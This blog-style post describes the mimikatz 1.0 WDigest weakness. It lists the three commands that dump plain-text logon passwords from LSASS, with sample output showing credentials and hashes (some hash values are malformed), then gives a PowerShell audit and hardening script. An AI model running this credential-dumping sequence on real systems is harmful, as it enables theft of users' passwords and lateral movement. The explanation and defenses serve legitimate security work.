A new version of the Windows credential tool mimikatz, 1.0, has recently been released. In addition to its existing functionality, it can now reveal the plain-text passwords of the users currently logged on to the machine.
The weakness mimikatz exploits lies in the WDigest security package (wdigest.dll), part of the Windows authentication stack. HTTP Digest Authentication computes its response from the user's plain-text password, so for Digest to work with single sign-on (SSO), that is, without prompting the user again, Windows keeps a copy of every logged-on user's password in LSASS memory. That copy is encrypted, but with keys that live in the same LSASS process, so anyone who can read LSASS memory can recover the clear-text password. In effect, the Windows developers relied on the difficulty of reading LSASS memory (security by obscurity) rather than on storing only a one-way hash.
To use mimikatz to reveal the credentials of logged-on users, run the following commands (local administrator rights are required, because the first step enables SeDebugPrivilege):
mimikatz # privilege::debug
mimikatz # inject::process lsass.exe sekurlsa.dll
mimikatz # @getLogonPasswords
You should see output similar to the following (mimikatz 1.0 prints its messages in French; they are translated here):
mimikatz # privilege::debug
Request to ENABLE privilege : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 680
Waiting for client connection...
Server connected to a client!
Message from the process : Welcome to a remote Gentil Kiwi process
SekurLSA : library for manipulating security data in LSASS

mimikatz # @getLogonPasswords

Authentication Id : 0;248844
Authentication package : NTLM
Primary user : ANONYMOUS LOGON
Authentication domain : NT AUTHORITY
msv1_0 : n.t. (LUID KO)
wdigest : n.t. (LUID KO)
tspkg : n.t. (LUID KO)

Authentication Id : 0;996
Authentication package : Negotiate
Primary user : PC01$
Authentication domain : WORKGROUP
msv1_0 : n.t. (LUID KO)
wdigest :
tspkg : n.t. (LUID KO)

Authentication Id : 0;575543
Authentication package : NTLM
Primary user : Administrator
Authentication domain : PC01
msv1_0 : lm{ 336dcb9831c8a03dka9872550c3cee6 }, ntlm{ 76af46e798f45ceb87805ba95380b39ed }
wdigest : password
tspkg : password

Authentication Id : 0;997
Authentication package : Negotiate
Primary user : LOCAL SERVICE
Authentication domain : NT AUTHORITY
msv1_0 : n.t. (LUID KO)
wdigest :
tspkg : n.t. (LUID KO)

Authentication Id : 0;62105
Authentication package : NTLM
Primary user :
Authentication domain :
msv1_0 : n.t. (LUID KO)
wdigest : n.t. (LUID KO)
tspkg : n.t. (LUID KO)

Authentication Id : 0;999
Authentication package : NTLM
Primary user : PC01$
Authentication domain : WORKGROUP
msv1_0 : n.t. (LUID KO)
wdigest :
tspkg : n.t. (LUID KO)

mimikatz #
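The dump above works only because LSASS holds a reversible copy of each logon password and because the attacker can open LSASS with SeDebugPrivilege. Microsoft later gave administrators two registry switches against exactly this: UseLogonCredential under the WDigest key (added to Windows 7 / Server 2008 R2 by KB2871997 in 2014, default 0 on Windows 8.1 / Server 2012 R2 and later), which stops WDigest from keeping the password at all, and RunAsPPL under the Lsa key (Windows 8.1 / Server 2012 R2 and later), which runs LSASS as a protected process so that an ordinary inject::process-style open fails. The PowerShell script below, added here as an example and not part of the original post or of mimikatz, audits both values and optionally sets them; run it from an elevated prompt.

```powershell
# Audit (and with -Remediate, set) the two LSASS hardening values that blunt
# WDigest plain-text credential dumping. Added example; not from the original post.
# Requires an elevated PowerShell session.
#
# UseLogonCredential : 0 = WDigest no longer keeps a reversible copy of the logon
#                      password in LSASS. An attacker with admin rights can flip
#                      it back to 1 and wait for the next logon, so monitor the key.
# RunAsPPL           : 1 = LSA Protection; LSASS runs as a protected process and a
#                      plain OpenProcess/inject from user mode is refused.
# Both changes need a reboot before they fully take effect, and credentials of
# sessions that were logged on before the change stay cached until then.

param(
    [switch]$Remediate   # apply the hardened values instead of only reporting
)

$checks = @(
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
       Name = 'UseLogonCredential'; Want = 0 },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
       Name = 'RunAsPPL'; Want = 1 }
)

foreach ($c in $checks) {
    # A missing value reads as $null; for UseLogonCredential on Windows 7 / 2008 R2
    # that means the reversible copy is still being kept.
    $current = (Get-ItemProperty -Path $c.Path -Name $c.Name -ErrorAction SilentlyContinue).($c.Name)
    $state   = if ($null -eq $current) { 'not set' } else { $current }
    $ok      = ($current -eq $c.Want)

    '{0}\{1} = {2} (want {3}) -> {4}' -f $c.Path, $c.Name, $state, $c.Want, $(if ($ok) { 'OK' } else { 'WEAK' })

    if (-not $ok -and $Remediate) {
        if (-not (Test-Path $c.Path)) { New-Item -Path $c.Path -Force | Out-Null }
        Set-ItemProperty -Path $c.Path -Name $c.Name -Value $c.Want -Type DWord
        '  set {0} to {1}; reboot for the change to take full effect' -f $c.Name, $c.Want
    }
}
```

Neither setting removes the NTLM hashes from the msv1_0 package (mimikatz still prints those for a local administrator), so these switches take away the clear-text password but not pass-the-hash; treat them as one layer, alongside keeping SeDebugPrivilege restricted to administrators you trust.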
mimikatz's functionality is currently being ported to the Metasploit Framework, which puts it in the hands of criminals and penetration testers alike.
mimikatz can be downloaded here (external link).
A detailed description of the vulnerability can be found here.